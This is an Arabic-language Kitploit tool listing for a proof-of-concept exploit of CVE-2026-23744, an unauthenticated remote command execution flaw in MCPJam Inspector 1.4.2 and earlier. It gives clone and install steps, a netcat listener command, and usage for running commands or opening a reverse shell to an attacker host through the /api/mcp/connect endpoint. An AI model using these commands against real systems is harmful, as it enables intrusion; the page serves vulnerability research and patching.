Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ozcanpng/cve-2026-23744
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubozcanpng/cve-2026-23744

CVE-2026-23744

إثبات مفهوم لتنفيذ تعليمات برمجية عن بُعد دون مصادقة لثغرة CVE-2026-23744 التي تستهدف MCPJam Inspector. يولّد حمولات serverConfig خاصة بـ MCP لاستغلال نقطة النهاية /api/mcp/connect مع دعم الصدفة العكسية وتصحيح الأخطاء عبر التشغيل التجريبي.

منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2026-23744 — تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في MCPJam Inspector

إثبات مفهوم (PoC) لتنفيذ التعليمات البرمجية عن بُعد بدون مصادقة لثغرة CVE-2026-23744. تعرّض MCPJam Inspector الإصدار 1.4.2 والإصدارات الأقدم وظائف عبر /api/mcp/connect يمكنها تشغيل أمر خادم MCP يتحكم فيه المهاجم دون مصادقة.

للاستخدام في الاختبارات والأبحاث المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


ماذا يفعل

root@kitploit:~
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
  1. ينشئ حمولة serverConfig مصممة بعناية لـ MCP.
  2. يستهدف نقطة النهاية /api/mcp/connect غير المحمية بمصادقة.
  3. يشغّل أمرًا مُهيأ عبر bash -c.
  4. يدعم التحقق الآمن من الأوامر وحمولات القشرة العكسية.
  5. يوفر أوضاع محاكاة/تصحيح لفحص الحمولة قبل إرسال حركة المرور.

لقطات الشاشة

إعداد القشرة العكسية

Reverse shell setup

حمولة اتصال MCPJam

MCPJam connect payload

استلام القشرة

Shell received


الإعداد

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt

الاستخدام

إثبات الأمر الآمن

root@kitploit:~
python3 CVE-2026-23744.py \
  --url http://127.0.0.1:3000 \
  --cmd 'id'

القشرة العكسية

ابدأ بمستمع أولاً:

root@kitploit:~
rlwrap nc -lvnp 4444

ثم شغّل:

root@kitploit:~
python3 CVE-2026-23744.py \
  --url http://127.0.0.1:3000 \
  --reverse-shell \
  --lhost 10.10.16.53 \
  --lport 4444

خيارات مفيدة:

root@kitploit:~
--cmd COMMAND       Command to execute (default: id)
--server-id VALUE   serverId value in the crafted MCP config (default: pwn)
--dry-run           Build payload flow without sending the HTTP request
--debug             Print endpoint and JSON payload
--verify-tls        Verify HTTPS certificates
--timeout SECONDS   HTTP timeout in seconds (default: 8)
--yes               Skip reverse-shell confirmation prompt

الإصدارات المتأثرة

المنتجالإصدار المتأثرالوصول المطلوبالتأثير
MCPJam Inspector<= 1.4.2لا شيءتنفيذ أوامر عن بُعد بصلاحيات مستخدم عملية MCPJam Inspector

تكون الثغرة بارزة بشكل خاص عندما يستمع MCPJam Inspector على 0.0.0.0، مما يسمح للمضيفين البعيدين بالوصول إلى خدمة التطوير.


ملاحظات

  • يرسل إثبات المفهوم حمولة JSON إلى /api/mcp/connect.
  • يتم تمرير الأمر عبر serverConfig.command و serverConfig.args.
  • فضّل --cmd للتحقق الآمن قبل محاولة القشرة العكسية.
  • استخدم --dry-run --debug لفحص الطلب المُنشأ دون لمس الهدف.
  • الإصدار 1.4.3 يحتوي على التصحيح الرسمي وفقًا لـ NVD.

المراجع

  • NVD — CVE-2026-23744
  • GitHub Security Advisory — GHSA-232v-j27c-5pp6
  • تثبيت التصحيح
  • MCPJam Inspector

مؤلف إثبات المفهوم

ozcanpng — github.com/ozcanpng — ozcanpng.dev

تنزيل الأداة